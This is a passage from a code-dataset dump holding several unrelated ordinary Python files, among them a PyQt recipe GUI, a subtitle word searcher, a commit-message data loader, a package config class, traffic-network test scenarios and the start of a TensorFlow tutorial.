mainMenu.addMenu(\"&File\")\n\t\tfileMenu.addAction(quitAction)\n\t\toptionsMenu = mainMenu.addMenu(\"&Options\")\n\t\toptionsMenu.addAction(toggleNegativeAction)\n\t\toptionsMenu.addAction(toggleBloodmoonAction)\n\t\toptionsMenu.addAction(toggleTribunalAction)\n\n\nclass Frame(QFrame):\n\tdef __init__(self, parent, x, y):\n\t\tsuper().__init__(parent)\n\t\tself.resize(x, y)\n\nclass EffectList(QListWidget):\n\tdef __init__(self, parent, x, y):\n\t\tsuper(EffectList, self).__init__(parent)\n\t\tself.resize(x, y)\n\t\tself.load()\n\n\tdef load(self):\n\t\tself.clear()\n\t\tfor effect in func.loadEffects():\n\t\t\tself.addItem(effect[\"name\"])\n\t\tself.setCurrentRow(0)\n\n\nclass RecipeList(QListWidget):\n\tdef __init__(self, parent, x, y):\n\t\tsuper(RecipeList, self).__init__(parent)\n\t\tself.resize(x, y)\n\n\tdef load(self, 
item):\n\t\tself.clear()\n\t\ttry:\n\t\t\ti = 0\n\t\t\tfor recipe in func.getRecipes(item):\n\t\t\t\titem = QListWidgetItem(\"{a}, {b}\". format(a=recipe[0][\"name\"], b=recipe[1][\"name\"]))\n\t\t\t\titem.setTextAlignment(Qt.AlignHCenter)\n\t\t\t\tself.addItem(item)\n\t\t\t\ti += 1\n\t\texcept AttributeError:\n\t\t\tpass\n\t\t# set recipeListTitle\n\t\trecipeListTitle.setText(\"Recipes found: {i}\".format(i=i))\n\n\nif __name__ == \"__main__\":\n\tapp = QApplication(sys.argv)\n\tw = Window()\n\n\tframeA = Frame(w, 229, 371)\n\tframeA.move(0, 25)\n\n\tframeB = Frame(w, 371, 142)\n\tframeB.move(229, 25)\n\n\tframeC = Frame(w, 371, 229)\n\tframeC.move(229, 167)\n\n\t#frameD = Frame(w, 600, 229)\n\t#frameD.move(0, 396)\n\n\t# effect list\n\n\teffectListTitle = QLabel(frameA)\n\teffectListTitle.resize(229, 25)\n\teffectListTitle.setText(\"Effect List\")\n\teffectListTitle.setAlignment(Qt.AlignCenter)\n\n\teffectList = EffectList(frameA, 229, 346)\n\teffectList.move(0, 25)\n\n\t# selected effect info\n\n\tselectedEffectTitle = QLabel(frameB)\n\tselectedEffectTitle.resize(371, 25)\n\tselectedEffectTitle.setAlignment(Qt.AlignCenter)\n\n\teffectInfo = QLabel(frameB)\n\teffectInfo.resize(321, 110)\n\teffectInfo.move(40, 25)\n\teffectInfo.setWordWrap(True)\n\teffectInfo.setAlignment(Qt.AlignCenter)\n\teffectInfo.setObjectName(\"info\")\n\n\teffectIcon = QLabel(frameB)\n\teffectIcon.resize(32, 32)\n\teffectIcon.move(10, 33)\n\n\t# recipe list\n\n\t#recipeListFrame = Frame(nwFrame, 386, 236)\n\t#recipeListFrame.move(236, 146)\n\n\trecipeListTitle = QLabel(frameC)\n\trecipeListTitle.resize(371, 25)\n\trecipeListTitle.setText(\"Recipe List\")\n\trecipeListTitle.setAlignment(Qt.AlignCenter)\n\n\trecipeList = RecipeList(frameC, 371, 204)\n\trecipeList.move(0, 25)\n\n\t# set default selected effect\n\tselectEffect(\"Cure Blight Disease\")\n\n\t# event handler\n\teffectList.currentItemChanged.connect(selectEffect)\n\trecipeList.currentItemChanged.connect(selectIngredients)\n\n\n\tw.show()\n\tsys.exit(app.exec_())","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"161035579","text":"import codecs\nimport re\n\n'''\nThis class is used to find lines and it's time from srt file\nWorldSearcher class require two parameters, \n'file' represents the directory as string, \n'world' represents the target world as string.\n\n\nThe 'results' function will return a array include all temples with time and sentence.\ne.g:\n[('00:41:56,540 --> 00:42:00,540\\r\\n', '龙母非常美丽\\r\\n'), ('00:51:16,870 --> 00:51:19,250\\r\\n', '找一座恬静 美丽的小岛\\r\\n')]\n\n\nThe total attribute is the total of results.\n'''\nclass WordSearcher():\n def __init__(self, file, word):\n self.target_word = word.lower()\n self.target_file = file\n self.time_scale = []\n self.if_illeage()\n self.total = self.time_scale.__len__()\n if self.total != 0:\n #the first time,just for test\n self.time_start = self.start_time()\n self.time_end = self.end_time()\n else:\n self.time_end = 0\n self.time_start = 0\n\n def if_illeage(self):\n if self.target_word.find('-->') == -1:\n self.search_word()\n\n def search_word(self):\n file = codecs.open(self.target_file, 'r', 'gb18030')\n judge1 = True\n judge2 = True\n while judge2:\n if judge1 == True:\n pos_time = file.readline()\n else:\n pos_time = pos_line\n while pos_time.find('-->') != -1:\n pos_line = file.readline()\n pos_line = pos_line.lower()\n pattern = '[^a-z]' + 
self.target_word + '[^a-z]'\n if re.search(pattern=pattern, string=pos_line):\n self.time_scale.append((pos_time, ' ' + pos_line + ' '))\n\n elif pos_line.find('-->') != -1:\n judge1 = False\n break\n elif not len(pos_line):\n judge2 = False\n break\n file.close()\n def results(self):\n return self.time_scale\n\n\n def start_time(self):\n h = int(self.time_scale[0][0][0:2]) * 3600\n m = int(self.time_scale[0][0][3:5]) * 60\n s = h + m + int(self.time_scale[0][0][6:8]) - 5\n return s * 1000\n\n def end_time(self):\n h = int(self.time_scale[0][0][17:19]) * 3600\n m = int(self.time_scale[0][0][20:22]) * 60\n s = h + m + int(self.time_scale[0][0][23:25]) + 5\n return s * 1000\n\n\n#Beneath part is for testing\nif __name__ == '__main__':\n srt1 = WordSearcher('srtSource/v1.srt', 'queen')\n print(srt1.results(), srt1.total)\n print(srt1.time_start)\n print(srt1.time_end)\n","sub_path":"MyWord.py","file_name":"MyWord.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"593437404","text":"from . import FixtureTest\n\n\nclass MultilineEncoded(FixtureTest):\n def test_multiline_encoded(self):\n # Way: Big Bear Boulevard (325846175)\n self.load_fixtures(['http://www.openstreetmap.org/way/325846175'])\n\n self.assert_feature_geom_type(16, 11473, 26126, 'roads',\n 325846175, 'LineString')\n","sub_path":"integration-test/768-multiline-encoded.py","file_name":"768-multiline-encoded.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"367054044","text":"## Host dummy functions for developemt only\nimport time\nimport random\nimport datetime\nfrom plotly import graph_objs as go\n\nimport streamlit as st\n\n@st.cache(show_spinner=False)\ndef get_data(mrn):\n time.sleep(1)\n dummy_current = 0\n dummy_data = [dummy_current]\n for _ in range(23):\n dummy_current += random.randint(3, 14)*1000\n dummy_data.append(dummy_current)\n return dummy_data\n\n@st.cache(show_spinner=False)\ndef run_inference(patient_data):\n time.sleep(3)\n _base = patient_data[\"meta\"][-1]\n def cumulative(base, array):\n new_array=[] \n j=0\n for i in range(0,len(array)):\n j+=array[i]\n new_array.append(base+j)\n return new_array\n \n return {k:cumulative(_base, [random.randint(30, 90)*1000 for _ in range(6)]) for k in patient_data[\"pathways\"]}\n\n@st.cache(show_spinner=False)\ndef get_predictions_plot(patient_data, preditions):\n x_size = len(patient_data[\"meta\"])\n today = datetime.datetime.today()\n x_dates = list([datetime.timedelta(days=x*30)+today for x in range(1,7)])\n x_dates = [x.date() for x in x_dates]\n date_3m_later = today+datetime.timedelta(days=30)\n\n fig = go.Figure()\n fig.add_traces([\n go.Scatter(\n x = x_dates,\n y = preditions[k],\n mode=\"lines\",\n name = k,\n text = [k]*len(x_dates),\n hovertemplate =\n '
<br>Pathway: %{text}<br>'+\n                'Date: %{x}<br>
'+\n 'Margin: %{y}'+\n '',\n ) \n for k in sorted(preditions.keys())\n ])\n fig.layout.xaxis.title= \"Date\"\n fig.layout.yaxis.title= \"Cumulative Pharmacy Margin\"\n fig.layout.plot_bgcolor='rgba(0,0,0,0)'\n\n fig.update_yaxes(\n tickprefix=\"$\",rangemode=\"nonnegative\", \n linecolor=\"black\",tickcolor=\"black\", ticks='inside',)\n \n fig.update_layout(\n xaxis = dict(\n range = [x_dates[0]-datetime.timedelta(days=14), x_dates[-1] + datetime.timedelta(days=14)], \n linecolor = \"black\", tickcolor=\"black\", ticks='inside',\n )\n )\n return fig","sub_path":"infer_dummy.py","file_name":"infer_dummy.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"416480433","text":"'''\nTag selector\n\nID : #name\nCLASS : .name\nTAS : name\nDESCENDENT : name li \nCHILD : name > li\n'''\n\nfrom bs4 import BeautifulSoup as bs\n\nhtml = \"\"\"\n\n \n
<html>\n  <body>\n    <div>\n      <h1>위키북스 도서</h1>\n      <ul class=\"items\">\n        <li>유니티 게임 이펙트 입문</li>\n        <li>스위프트로 시작하는 아이폰 앱 개발 교과서</li>\n        <li>모던 웹사이트 디자인의 정석</li>\n      </ul>\n    </div>\n  </body>\n</html>
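<!-- selector cheat-sheet applied: select_one('body > div > h1') returns the single h1 node above; select('ul.items li') returns the three book li nodes; select_one('ul').attrs shows the class attribute -->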
\n \n\n\"\"\"\n\nsoup = bs(html, 'html.parser')\n\nselcet_one = soup.select_one('body > div > h1') # select a property\n\nselect = soup.select('ul.items li') # select perperties\n\nprint(selcet_one.string)\n\nprint(soup.select_one('ul').attrs)\n\nprint([li.string for li in select])","sub_path":"scraping/bs_practice.py","file_name":"bs_practice.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"600312667","text":"# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nimport random\nfrom typing import Tuple, Union, Iterable, List\n\nimport numpy as np\nfrom keras.preprocessing.sequence import pad_sequences\n\n\"\"\"\nUtils to load processed data into python data structures.\n\"\"\"\n\nDIFF_END = b'\\x01'\nMSG_BEGIN = b'\\x00'\nMSG_END = b'\\x01'\n\n__diff_end = np.fromstring(DIFF_END, np.uint8)[0]\n__msg_begin = np.fromstring(MSG_BEGIN, np.uint8)[0]\n__msg_end = np.fromstring(MSG_END, np.uint8)[0]\n\n\ndef one_hot_encode_diff(bytes_to_encode: bytes) -> np.ndarray:\n \"\"\"\n One-hot encode the given bytes into 2D float32 numpy array.\n\n Any bytes with values < 2 are sent to 2, and any values > 127\n are sent to 127. The value 1 is used as a special marker:\n\n 1 : end of commit diff\n\n See also: DIFF_END and MSG_END.\n\n Inputs\n ------\n bytes_to_encode : bytes\n The bytes to be one-hot encode.\n\n Returns\n -------\n y : 2D float32 numpy array of one-hot encoded values\n \"\"\"\n x = np.fromstring(bytes_to_encode + DIFF_END, np.uint8)\n x = np.clip(x, 2, 127)\n x[-1] = __diff_end\n y = np.zeros((x.size, 128), dtype=np.float32)\n y[np.arange(y.shape[0]), x] = 1.0\n return y\n\n\ndef one_hot_encode_msg(bytes_to_encode: bytes) -> np.ndarray:\n \"\"\"\n One-hot encode the given bytes into 2D float32 numpy array.\n\n Any bytes with values < 2 are sent to 2, and any values > 127\n are sent to 127. The values 0 and 1 are used as special markers:\n\n 0 : beginning of commit message\n 1 : end of commit message\n\n See also: DIFF_END and MSG_END.\n\n Inputs\n ------\n bytes_to_encode : bytes\n The bytes to be one-hot encode.\n\n Returns\n -------\n y : 2D float32 numpy array of one-hot encoded values\n \"\"\"\n x = np.fromstring(MSG_BEGIN + bytes_to_encode + MSG_END, np.uint8)\n x = np.clip(x, 2, 127)\n x[0] = __msg_begin\n x[-1] = __msg_end\n y = np.zeros((x.size, 128), dtype=np.float32)\n y[np.arange(y.shape[0]), x] = 1.0\n return y\n\n\ndef _read(filename: Union[str, Path], maxlen: int=-1):\n with open(filename, 'rb') as fp:\n return fp.read(maxlen)\n\n\ndef load(repo_path: Union[str, Path], cv_train_split: float, which: str,\n max_diff_len: int=-1, max_msg_len: int=-1\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Loads the processed data from\n `/data/processed-repos/` into\n two length-N lists `x,y` of 2D numpy arrays such that\n\n x[i] : JxL array encoding the commit diff\n y[i] : KxL array encoding the commit message\n\n The one-hot-encoding is done one character at a time,\n treating the text as ASCII text, and any bytes with\n values < 2 are sent to 2, and any values > 127 are sent\n to 127. The values 0 and 1 are used as special markers:\n\n 0 : beginning of message\n 1 : end of commit message/end of diff\n\n Data will be split into training/validation by sorting the\n commits SHAs and taking the first section as training and\n the second section as validation.\n\n WARNING :\n Since data is split by the commit SHAs, data leakage may\n occur. 
For example, a regular commit and a *merge* commit\n with the same diff/message may be in different splits.\n\n Inputs\n ------\n repo : str or Path-like\n A folder relative to `/data/processed-repos`\n cv_train_split : float\n A number between 0 and 1 inclusive, the amount of data\n used for training vs. validation. The number of commits\n multiplied by this number and truncated will be used for\n training and the rest for validation.\n which : str\n One of 'train' or 'val' indicating whether the training\n data or the validation data should be returned respectively.\n max_diff_len : int\n Maximum number of bytes to read from the diff file.\n If negative, the whole file is read. Note that an extra\n byte is added to diffs, so the maximum length of x-data\n returned will be `max_diff_len + 1`.\n max_msg_len : int\n Maximum number of bytes to read from the message file.\n If negative, the whole file is read. Note that an extra\n two bytes are added to messages, so the maximum length of\n y-data returned will be `max_msg_len + 2`.\n\n Returns\n -------\n (x,y) tuples of lists of 2D numpy arrays.\n\n See also\n --------\n `one_hot_encode_diff`\n `one_hot_encode_msg`\n \"\"\"\n repo_path = Path(__file__).parents[2] / 'data/processed-repos' / repo_path\n commits = sorted(set([f.parent / f.stem for f in repo_path.glob('*')]))\n\n x = [one_hot_encode_diff(_read(c.with_suffix('.diff'), max_diff_len))\n for c in commits]\n y = [one_hot_encode_msg(_read(c.with_suffix('.msg'), max_msg_len))\n for c in commits]\n\n split = int(len(commits) * cv_train_split)\n\n if which == 'train':\n return x[:split], y[:split]\n if which == 'val':\n return x[split:], y[split:]\n raise ValueError('`which` must be one of [\"train\", \"val\"]')\n\n\ndef load_train_generator(repo_path: Union[str, Path], cv_train_split: float,\n max_diff_len: int=-1, max_msg_len: int=-1\n ) -> Iterable[Tuple[np.ndarray, np.ndarray]]:\n \"\"\"\n A generator giving access to the data located in\n `/data/processed-repos/`.\n Will continue to return samples x,y with\n\n x : JxL array encoding the commit diff\n y : KxL array encoding the commit message\n\n The one-hot-encoding is done one character at a time,\n treating the text as ASCII text, and any bytes with\n values < 2 are sent to 2, and any values > 127 are sent\n to 127. The values 0 and 1 are used as special markers:\n\n 0 : end of commit diff\n 1 : end of commit message\n\n The generator will only yield the training portion of the data.\n\n Inputs\n ------\n repo : str or Path-like\n A folder relative to `/data/processed-repos`\n cv_train_split : float\n A number between 0 and 1 inclusive, the amount of data\n used for training vs. validation. The number of commits\n multiplied by this number and truncated will be used for\n training and the rest for validation.\n max_diff_len : int\n Maximum number of bytes to read from the diff file.\n If negative, the whole file is read.\n max_msg_len : int\n Maximum number of bytes to read from the message file.\n If negative, the whole file is read.\n\n WARNING :\n Since data is split by the commit SHAs, data leakage may\n occur. 
For example, a regular commit and a *merge* commit\n with the same diff/message may be in different splits.\n\n Returns\n -------\n generator repeatedly yielding\n x,y : Two 2D numpy arrays.\n \"\"\"\n repo_path = Path(__file__).parents[2] / 'data/processed-repos' / repo_path\n commits = sorted(set(f.parent / f.stem for f in repo_path.glob('*')))\n\n split = int(len(commits) * cv_train_split)\n commits = commits[:split]\n while True:\n c = random.choice(commits)\n x = one_hot_encode_diff(_read(c.with_suffix('.diff'), max_diff_len))\n y = one_hot_encode_msg(_read(c.with_suffix('.msg'), max_msg_len))\n yield x, y\n\n\ndef format_batch(batch: List[Tuple[np.ndarray, np.ndarray]],\n max_diff_len: int,\n max_msg_len: int\n ) -> Tuple[List[np.ndarray], np.ndarray]:\n \"\"\"\n Format a batch by padding sequences with 0s up to the maximum lengths\n given. Also slices the message `y` into `y0` and `y1` similarly to\n y0, y1 = y[:-1], y[1:]\n since the model needs to learn to predict the next element `y1[i]`\n from the current element `y0[i]`.\n\n Returns values in the format expected by keras for the trainer\n model, i.e. `([x, y0], y1)`, since `x` and `y0` are inputs and `y1`\n is an output.\n\n Inputs\n ------\n batch : List\n Each element of batch is a tuple of (x,y) data where x is the\n encoded diff and y is the encoded commit message.\n max_diff_len : int\n The encoded diffs will be padded to at most this length by\n adding 0s to the *front* of the sequence. Any encodings\n greater than this length are truncated by removing from\n the *front*. This ensures the end of the diff will still\n be indicated by the special DIFF_END value.\n max_msg_len : int\n The encoded messages will be padded to at most this length by\n adding 0s to the *end* of the sequence. Any encodings\n greater than this length are truncated by removing from\n the *end*. 
This ensures that the beginning of the message\n is still indicated by the special MSG_BEGIN value.\n\n Returns\n -------\n ([x,y0], y1)\n x is the 3D padded diff encodings\n y0 is the 3D padded message encodings, except the last element\n y1 is the 3D padded message encodings, except the first element\n \"\"\"\n xs = [d[0] for d in batch]\n xs = pad_sequences(xs,\n maxlen=max_diff_len,\n dtype='float32',\n padding='pre',\n truncating='pre',\n value=0.0)\n\n ys = [d[1] for d in batch]\n ys = pad_sequences(ys,\n maxlen=max_msg_len,\n dtype='float32',\n padding='post',\n truncating='post',\n value=0.0)\n\n return [xs, ys[:, :-1, :]], ys[:, 1:, :] # type: ignore # mypy hates slice\n","sub_path":"dashm/data/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":9611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"218904103","text":"\"\"\"Config data\n\n\"\"\"\n\nimport configparser\nimport logging\nimport os\nimport site\n\nfrom squid_py.constants import (\n KEEPER_CONTRACTS\n)\n\nDEFAULT_KEEPER_HOST = 'localhost'\nDEFAULT_KEEPER_PORT = 8545\nDEFAULT_KEEPER_URL = 'http://localhost:8545'\nDEFAULT_KEEPER_PATH = 'contracts'\nDEFAULT_GAS_LIMIT = 300000\nDEFAULT_NAME_PROVIDER_URL = 'http://localhost:5000'\n\nNAME_KEEPER_URL = 'keeper.url'\nNAME_KEEPER_PATH = 'keeper.path'\nNAME_GAS_LIMIT = 'gas_limit'\nNAME_PROVIDER_URL = 'provider.url'\nNAME_MARKET_ADDRESS = 'market.address'\nNAME_AUTH_ADDRESS = 'auth.address'\nNAME_TOKEN_ADDRESS = 'token.address'\n\nenviron_names = {\n NAME_KEEPER_URL: ['KEEPER_URL', 'Keeper URL'],\n NAME_KEEPER_PATH: ['KEEPER_PATH', 'Path to the keeper contracts'],\n NAME_GAS_LIMIT: ['GAS_LIMIT', 'Gas limit'],\n NAME_PROVIDER_URL: ['PROVIDER_URL', 'Provider URL'],\n NAME_MARKET_ADDRESS: ['MARKET_ADDRESS', 'Market address'],\n NAME_AUTH_ADDRESS: ['AUTH_ADDRESS', 'Auth address'],\n NAME_TOKEN_ADDRESS: ['TOKEN_ADDRESS', 'Token address'],\n}\n\nconfig_defaults = {\n KEEPER_CONTRACTS: {\n NAME_KEEPER_URL: DEFAULT_KEEPER_URL,\n NAME_KEEPER_PATH: DEFAULT_KEEPER_PATH,\n NAME_GAS_LIMIT: DEFAULT_GAS_LIMIT,\n NAME_PROVIDER_URL: DEFAULT_NAME_PROVIDER_URL,\n NAME_MARKET_ADDRESS: '',\n NAME_AUTH_ADDRESS: '',\n NAME_TOKEN_ADDRESS: '',\n }\n}\n\n\nclass Config(configparser.ConfigParser):\n\n def __init__(self, filename=None, **kwargs):\n configparser.ConfigParser.__init__(self)\n\n self.read_dict(config_defaults)\n self._section_name = KEEPER_CONTRACTS\n self._logger = kwargs.get('logger', logging.getLogger(__name__))\n self._logger.debug('Config: loading config file %s', filename)\n\n if filename:\n with open(filename) as fp:\n text = fp.read()\n self.read_string(text)\n else:\n if 'text' in kwargs:\n self.read_string(kwargs['text'])\n self._load_environ()\n\n def _load_environ(self):\n for option_name, environ_item in environ_names.items():\n value = os.environ.get(environ_item[0])\n if value is not None:\n self._logger.debug('Config: setting environ %s = %s', option_name, value)\n self.set(self._section_name, option_name, value)\n\n def set_arguments(self, items):\n for name, value in items.items():\n if value is not None:\n self._logger.debug('Config: setting argument %s = %s', name, value)\n self.set(self._section_name, name, value)\n\n @property\n def keeper_path(self):\n path = self.get(self._section_name, NAME_KEEPER_PATH)\n if os.path.exists(path):\n pass\n elif os.getenv('VIRTUAL_ENV'):\n path = os.path.join(os.getenv('VIRTUAL_ENV'), 'contracts')\n else:\n path = os.path.join(site.PREFIXES[0], 'contracts')\n return 
path\n\n # properties\n\n @property\n def keeper_url(self):\n return self.get(self._section_name, NAME_KEEPER_URL)\n\n @property\n def gas_limit(self):\n return int(self.get(self._section_name, NAME_GAS_LIMIT))\n\n @property\n def provider_url(self):\n return self.get(self._section_name, NAME_PROVIDER_URL)\n\n @property\n def address_list(self):\n return {\n 'market': self.get(self._section_name, NAME_MARKET_ADDRESS),\n 'auth': self.get(self._section_name, NAME_AUTH_ADDRESS),\n 'token': self.get(self._section_name, NAME_TOKEN_ADDRESS),\n }\n\n # static methods\n\n @staticmethod\n def get_environ_help():\n result = []\n for option_name, environ_item in environ_names.items():\n # codacy fix\n assert option_name\n result.append(\"{:20}{:40}\".format(environ_item[0], environ_item[1]))\n return \"\\n\".join(result)\n","sub_path":"squid_py/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"186574326","text":"import networkx as nx\nimport operator\nimport json\nfrom networkx.readwrite import json_graph\nfrom collections import OrderedDict\nfrom math import radians, cos, sin, asin, sqrt\n\n# 3x3 lattice\n\ndef create_3x3_lattice():\n \n G = nx.DiGraph()\n \n nodes = [0,1,2,3,4,5,6,7,8]\n labels = {}\n for node in nodes:\n labels[node] = r'$' + str(node) + r'$'\n G.add_nodes_from(nodes)\n pos = ([\n (0,10),\n (5,10),\n (10,10),\n (0,5),\n (5,5),\n (10,5),\n (0,0),\n (5,0),\n (10,0)\n ])\n \n # randomly generated, should have solution\n edges = [\n (0, 1, {'time': 9.33, 'capacity': 18.31}),\n (0, 3, {'time': 8.84, 'capacity': 8.31}),\n (1, 0, {'time': 9.33, 'capacity': 18.31}),\n (1, 2, {'time': 0.87, 'capacity': 16.48}),\n (1, 4, {'time': 4.95, 'capacity': 12.64}),\n (2, 1, {'time': 0.87, 'capacity': 16.48}),\n (2, 5, {'time': 8.15, 'capacity': 8.08}),\n (3, 0, {'time': 8.84, 'capacity': 8.31}),\n (3, 4, {'time': 3.83, 'capacity': 19.45}),\n (3, 6, {'time': 5.96, 'capacity': 2.69}),\n (4, 1, {'time': 4.95, 'capacity': 12.64}),\n (4, 3, {'time': 3.83, 'capacity': 19.45}),\n (4, 5, {'time': 7.72, 'capacity': 3.38}),\n (4, 7, {'time': 3.08, 'capacity': 19.23}),\n (5, 8, {'time': 1.96, 'capacity': 13.80}),\n (5, 2, {'time': 8.15, 'capacity': 8.08}),\n (5, 4, {'time': 7.72, 'capacity': 3.38}),\n (6, 3, {'time': 5.96, 'capacity': 2.69}),\n (6, 7, {'time': 7.74, 'capacity': 14.54}),\n (7, 8, {'time': 4.18, 'capacity': 1.03}),\n (7, 4, {'time': 3.08, 'capacity': 19.23}),\n (7, 6, {'time': 7.74, 'capacity': 14.54}),\n (8, 5, {'time': 1.96, 'capacity': 13.80}),\n (8, 7, {'time': 4.18, 'capacity': 1.03}),\n ]\n\n G.add_edges_from(edges)\n\n demands =[(0, 1, 1.12),\n (0, 2, 0.18),\n (0, 3, 0.78),\n (0, 4, 0.15),\n (0, 5, 1.05),\n (0, 6, 0.91),\n (0, 7, 0.08),\n (0, 8, 0.99),\n (1, 0, 0.81),\n (1, 2, 0.60),\n (1, 3, 0.12),\n (1, 4, 0.65),\n (1, 5, 0.71),\n (1, 6, 0.39),\n (1, 7, 1.11),\n (1, 8, 1.01),\n (2, 0, 0.47),\n (2, 1, 0.21),\n (2, 3, 0.41),\n (2, 4, 0.12),\n (2, 5, 0.66),\n (2, 6, 0.46),\n (2, 7, 0.75),\n (2, 8, 0.65),\n (3, 0, 0.12),\n (3, 1, 1.15),\n (3, 2, 1.01),\n (3, 4, 0.70),\n (3, 5, 0.32),\n (3, 6, 0.40),\n (3, 7, 0.87),\n (3, 8, 0.19),\n (4, 0, 0.00),\n (4, 1, 0.01),\n (4, 2, 0.09),\n (4, 3, 0.41),\n (4, 5, 0.18),\n (4, 6, 0.95),\n (4, 7, 0.83),\n (4, 8, 0.80),\n (5, 0, 0.94),\n (5, 1, 0.10),\n (5, 2, 0.32),\n (5, 3, 0.15),\n (5, 4, 0.10),\n (5, 6, 0.24),\n (5, 7, 0.54),\n (5, 8, 1.03),\n (6, 0, 0.27),\n (6, 1, 0.53),\n (6, 2, 1.05),\n (6, 3, 1.10),\n (6, 4, 0.38),\n 
(6, 5, 0.82),\n (6, 7, 0.03),\n (6, 8, 0.38),\n (7, 0, 0.08),\n (7, 1, 0.30),\n (7, 2, 1.15),\n (7, 3, 0.54),\n (7, 4, 0.90),\n (7, 5, 0.69),\n (7, 6, 0.45),\n (7, 8, 0.99),\n (8, 0, 0.94),\n (8, 1, 0.41),\n (8, 2, 0.84),\n (8, 3, 0.24),\n (8, 4, 0.90),\n (8, 5, 0.26),\n (8, 6, 0.33),\n (8, 7, 0.60),\n ]\n\n return G, pos, demands\n\ndef create_2x2_lattice():\n\n G = nx.DiGraph()\n nodes = [0,1,2,3]\n labels = {}\n for node in nodes:\n labels[node] = r'$' + str(node) + r'$'\n G.add_nodes_from(nodes)\n pos = ([\n (0,0),\n (0,5),\n (5,5),\n (5,0),\n ])\n edges = [\n (0, 1, {'time': 9.33, 'capacity': 18}),\n (0, 3, {'time': 8.84, 'capacity': 8}),\n (1, 0, {'time': 9.33, 'capacity': 18}),\n (1, 2, {'time': 4.95, 'capacity': 12}),\n (3, 0, {'time': 8.84, 'capacity': 8}),\n (3, 2, {'time': 3.83, 'capacity': 19}),\n (2, 1, {'time': 4.95, 'capacity': 12}),\n (2, 3, {'time': 3.83, 'capacity': 19}),\n ]\n\n G.add_edges_from(edges)\n\n demands =[\n (0, 1, 0.12),\n (0, 2, 0.58),\n (0, 3, 0.38),\n (1, 0, 0.21),\n (1, 2, 1.10),\n (1, 3, 0.42),\n (2, 0, 0.47),\n (2, 1, 0.21),\n (2, 3, 0.41),\n (3, 0, 1.12),\n (3, 1, 0.15),\n (3, 2, 0.01),\n ]\n\n return G, pos, demands\n\n# haversine\ndef haversine(loc1, loc2):\n \"\"\"\n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees)\n \"\"\"\n lat1, lon1 = loc1\n lat2, lon2 = loc2\n # convert decimal degrees to radians \n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n # haversine formula \n dlon = lon2 - lon1 \n dlat = lat2 - lat1 \n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a)) \n m = 6367 * c * 1000.0\n return m\n\n#from machinelearningmaster.com\ndef get_neighbor(training_set, test_instance, k):\n distances = []\n for label1, loc1 in training_set.iteritems():\n dist = haversine(test_instance, loc1)\n distances.append((label1, dist))\n distances.sort(key = operator.itemgetter(1))\n neighbors = []\n for x in range(k):\n neighbors.append(distances[x][0])\n return neighbors\n\n\ndef create_manhattan_scenario(load='high', reduced = False):\n #load graph, get positions\n if reduced:\n with open('assets/manhattan_road_netx_constrained.json','r') as data_file: \n road_graph = json_graph.node_link_graph(json.load(data_file))\n else:\n with open('assets/manhattan_road_netx.json','r') as data_file: \n road_graph = json_graph.node_link_graph(json.load(data_file))\n\n pos = OrderedDict({node: (road_graph.node[node][\"latlon\"][1],\n road_graph.node[node][\"latlon\"][0]) for node in road_graph.nodes()})\n \n with open('assets/manhattan_demands_50.json','r') as f:\n raw_demands = json.loads(f.read())\n \n #implement 1-NN, get relationship of source, sink -> source_node, sink_node\n station_to_node = {}\n\n for station, loc in raw_demands['stations'].iteritems():\n node = get_neighbor(pos, (loc[1], loc[0]), 1)[0]\n station_to_node[station] = road_graph.nodes().index(node)\n\n\n #create demands list of tuples using the 1-NN relationship and the demands\n demands = {}\n\n for scenario in raw_demands['scenarios']:\n demands[scenario] = {}\n for demand in raw_demands['scenarios'][scenario]:\n src = station_to_node[demand[0]]\n snk = station_to_node[demand[1]]\n if src in demands[scenario]:\n if snk in demands[scenario][src]:\n demands[scenario][src] += demand[2]\n else:\n demands[scenario][src][snk] = demand[2]\n else:\n demands[scenario][src] = {}\n demands[scenario][src][snk] = demand[2]\n dems = []\n for src, sinks in demands[scenario].iteritems():\n for snk, d in 
sinks.iteritems():\n dems.append((src,snk,d))\n demands[scenario] = dems\n \n return road_graph, pos, demands[load]\n \n \n","sub_path":"notebooks/amod/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":7399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"181283157","text":"#coding:utf-8\n\"\"\"\nauthor: hxtkyne\nsource: https://github/hxtkyne\nreference: http://adventuresinmachinelearning.com/python-tensorflow-tutorial/\nresult: 0.9787 with epochs=20\ndate: 2018-03-06\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# simple test on a=(b+c)*(c+2)\ndef simple_test():\n\t# note: these constants, variables, operations and \n\t# computer graph are only created when initialisation are run\n\n\t# create constant\n\tconst = tf.constant(2.0, name='const')\n\n\t# create TF variables\n\tb_is_tensor = True\n\tif b_is_tensor:\n\t\t# note we should specilize the variable type in placeholder\n\t\tb = tf.placeholder(tf.float32, [None,1], name='b')\n\telse:\n\t\tb = tf.Variable(2.0, name='b')\n\tc = tf.Variable(1.0, name='c')\n\n\t# create operations, a,d,e are operations, not variables\n\td = tf.add(b,c, name='d')\n\te = tf.add(c, const, name='e')\n\ta = 